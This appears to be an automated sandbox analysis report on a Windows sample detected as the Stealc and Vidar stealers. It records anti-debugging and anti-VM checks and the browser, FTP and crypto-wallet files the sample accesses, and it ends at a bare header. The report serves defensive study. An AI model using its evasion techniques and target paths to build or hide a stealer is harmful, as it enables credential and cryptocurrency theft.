Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4AD97 second address: D4AD9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4AD9B second address: D4ADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4ADA1 second address: D4ADC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B0E0 second address: D4B0EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B0EA second address: D4B0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B0EE second address: D4B10D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830ED6D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FF830ED6D3Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B10D second address: D4B111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B93A15 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D3B584 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D39CFB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D6A8C6 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0095D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009639B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_009639B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0095E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009643F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009643F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0095BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0095F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00951710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00951710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00964050 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00964050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009633C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009633C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0095EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0095DC50

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00967970 GetSystemInfo,wsprintfA,

0_2_00967970

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: AEHIJDAF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: AEHIJDAF.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: AEHIJDAF.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: AEHIJDAF.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: AEHIJDAF.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: AEHIJDAF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265661431.0000000001232000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AEHIJDAF.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: AEHIJDAF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: AEHIJDAF.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: AEHIJDAF.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: AEHIJDAF.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware.
Source: AEHIJDAF.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: AEHIJDAF.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AEHIJDAF.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AEHIJDAF.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: AEHIJDAF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AEHIJDAF.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AEHIJDAF.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AEHIJDAF.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: AEHIJDAF.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: AEHIJDAF.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AEHIJDAF.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: AEHIJDAF.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AEHIJDAF.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: AEHIJDAF.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: AEHIJDAF.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AEHIJDAF.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: AEHIJDAF.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: AEHIJDAF.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: AEHIJDAF.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: AEHIJDAF.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58161
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58158
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59347
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58180
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58212
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58172

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6D5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6D5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00954610 VirtualProtect ?,00000004,00000100,00000000

0_2_00954610

Source: C:\Users\user\Desktop\file.exe

0_2_00969270

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00969160 mov eax, dword ptr fs:[00000030h]

0_2_00969160

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00960090 GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,

0_2_00960090

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C6AB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C6AB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009690A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_009690A0

Source: file.exe, file.exe, 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6AB341 cpuid

0_2_6C6AB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00967630

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009663C0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_009663C0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009672F0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_009672F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009674D0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_009674D0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

